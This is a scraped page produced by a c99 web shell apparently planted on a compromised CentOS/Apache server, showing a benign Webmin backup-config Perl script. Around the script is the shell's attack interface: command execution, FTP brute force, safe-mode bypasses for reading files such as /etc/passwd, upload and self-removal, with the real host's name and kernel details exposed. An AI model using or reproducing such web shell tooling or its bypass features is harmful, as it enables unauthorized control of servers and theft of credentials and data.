!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/backup-config/   drwxr-xr-x
Free 49.58 GB of 127.8 GB (38.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     edit.cgi (2.73 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Show one scheduled backup

use strict;
use warnings;
require './backup-config-lib.pl';
our (%in, %text);
&ReadParse();

my $backup;
if ($in{'new'}) {
    &ui_print_header(undef, $text{'edit_title1'}, "");
    $backup = { 'emode' => 0,
            'sched' => 1,
            'mins' => 0,
            'hours' => 0,
            'days' => '*',
            'months' => '*',
            'weekdays' => '*' };
    }
else {
    &ui_print_header(undef, $text{'edit_title2'}, "");
    $backup = &get_backup($in{'id'});
    }

print &ui_form_start("save.cgi", "post");
print &ui_hidden("new", $in{'new'});
print &ui_hidden("id", $in{'id'});

my @tds = ( "width=30%" );
print &ui_hidden_table_start($text{'edit_header'}, "width=100%", 2,
                 "main", 1, \@tds);

# Show modules to backup
my @mods = &list_backup_modules();
my @dmods = split(/\s+/, $backup->{'mods'});
print &ui_table_row($text{'edit_mods'},
            &ui_select("mods", \@dmods,
               [ map { [ $_->{'dir'}, $_->{'desc'} ] } @mods ],
               10, 1));

# Show destination
print &ui_table_row($text{'edit_dest'},
            &show_backup_destination("dest", $backup->{'dest'}, 0));

# Show files to include
print &ui_table_row($text{'edit_what'},
            &show_backup_what("what", $backup->{'configfile'},
                          $backup->{'nofiles'},
                          $backup->{'others'}));

print &ui_hidden_table_end();

print &ui_hidden_table_start($text{'edit_header2'}, "width=100%", 2,
                 "prepost", 0, \@tds);

# Show pre-backup command
print &ui_table_row($text{'edit_pre'},
            &ui_textbox("pre", $backup->{'pre'}, 60));

# Show post-backup command
print &ui_table_row($text{'edit_post'},
            &ui_textbox("post", $backup->{'post'}, 60));

print &ui_hidden_table_end();

print &ui_hidden_table_start($text{'edit_header3'}, "width=100%", 2,
                 "sched", 0, \@tds);

# Show email address
print &ui_table_row($text{'edit_email'},
            &ui_textbox("email", $backup->{'email'}, 40));

# Show email mode
print &ui_table_row($text{'edit_emode'},
            &ui_radio("emode", $backup->{'emode'},
                  [ [ 0, $text{'edit_emode0'} ],
                [ 1, $text{'edit_emode1'} ] ]));

# Show schedule
my $job;
if ($backup) {
    $job = &find_cron_job($backup);
    }
print &ui_table_row($text{'edit_sched'},
            &ui_radio("sched", $job || $in{'new'} ? 1 : 0,
                  [ [ 0, $text{'no'} ],
                [ 1, $text{'edit_schedyes'} ] ]));
print &ui_table_row(undef,
    "<tr> <td colspan=2><table border width=100%>\n".
    &capture_function_output(\&cron::show_times_input, $backup).
    "</table></td> </tr>\n");

print &ui_hidden_table_end();
if ($in{'new'}) {
    print &ui_form_end([ [ 'create', $text{'create'} ] ], "100%");
    }
else {
    print &ui_form_end([ [ 'save', $text{'save'} ],
                 [ 'run', $text{'edit_run'} ],
                 [ 'delete', $text{'delete'} ] ], "100%");
    }

&ui_print_footer("", $text{'index_return'});



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0147 ]--